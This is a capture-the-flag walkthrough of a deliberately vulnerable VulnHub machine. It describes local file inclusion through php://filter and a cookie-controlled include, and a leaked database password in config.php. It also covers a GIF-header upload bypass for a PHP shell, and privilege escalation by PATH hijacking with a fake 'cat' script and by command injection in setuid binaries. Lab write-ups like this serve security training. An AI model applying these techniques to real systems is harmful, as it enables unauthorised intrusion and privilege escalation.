Thanks to Claor @Chronicoder and VulnHub folks for the opportunity of writing another walkthrough for a very challenging vulnerable machine.
First thing first, I fired-up nmap. Usually I do that, run nmap and after that nikto. 😀

As it can be observed, only two ports are of interest: 80 (for HTTP) and 3306, on which runs mysql.

Starting out nikto, it will reveal the following information:

On port 80 there is an web application with an upload section but in order to upload files we have to be authenticated:

The URL structure indicates that the application might be vulnerable to Local File Inclusion.

After some tests, I succeeded to include files from the server by using php://filter/convert.base64-encode/resource method, which seems to be the only way of reading files.

The browser will display the source code of upload.php file encoded in base64:

With the same technique I have read the source code of all the php files available. In index.php a piece of code caught my attention:

<?php

//Multilingual. Not implemented yet.

//setcookie("lang","en.lang.php");

if (isset($_COOKIE['lang']))

{

include("lang/".$_COOKIE['lang']);

}

// Not implemented yet.

?>

It looks like another way of doing local file inclusion and a quick test shows that it works as expected:

I took into consideration the results of nikto, that revealed the existence of a config.php file and using the above technique we can get the source code of this file:

<?php

$server = "localhost";

$username = "root";

$password = "H4u%QJ_H99";

$database = "Users";

?>

We remembered that the machine has mysql port opened, and now that we have credentials for the database we can connect to it.

Also in the database I discovered the users and base64 encoded passwords to log in into the web application.

Now that we have the credentials we can log into the application and find our way to execute commands on the operating system.

The next step is to upload a file with php code, but soon I realized that is not an easy job to do. Having the source code of the upload.php file I was able to see that the application restricts the extensions, verifies that the content-type contains image and also verifies the mime-type. So there is no other way to upload a file with php extension.

What we can do is to upload a text file with gif extension, put php code in it, and start the file content with a valid gif header.

The file is uploaded in /upload folder, having the original file name transformed in its MD5 hash.

Now we can use the LFI present in lang cookie, to execute our uploaded shell.

Now is time to enumerate various information of the system, even use Linenum script to have comprehensive information, but no low hanging fruit was found.

Doing a quick review of the information that we gathered so far and trying to match everything, I realized that I have some users and passwords from mysql database, the same users are present on the system (/etc/passwd)…maybe the passwords are also valid on the operating system.

We observed a file called msgmike in kane’s folder, that is owened by user mike and also has setuid bit set.

Running the file we see that it generates an error about a missing file in mike’s home. Analyzing msgmike binary with strings tool we observe the full command that is used and also that a relative path is utilized when running cat and this gives me an idea.

We can manipulate the PATH environment variable and point to a different catprogram, one that will do a shell spawn for us 🙂

We modify PATH to begin with /tmp – the location where we will create a file named cat.

#!/bin/sh

echo "#\!/bin/sh" >/tmp/cat

echo "/bin/sh" >>/tmp/cat

Now it`s time to run msgmike again and get our shell as mike user:

In mike’s home folder we also find a binary that is owned this time by root and has setuid flag set. Running it, it prompts for some input that it echoes back and closes.

Analyzing the binary with strings tool, we discover the command that it is used.

It looks like command injection might be possible, and we give it a try.

An now, by the power invested in me by the state of root, I present you the flag.txt content: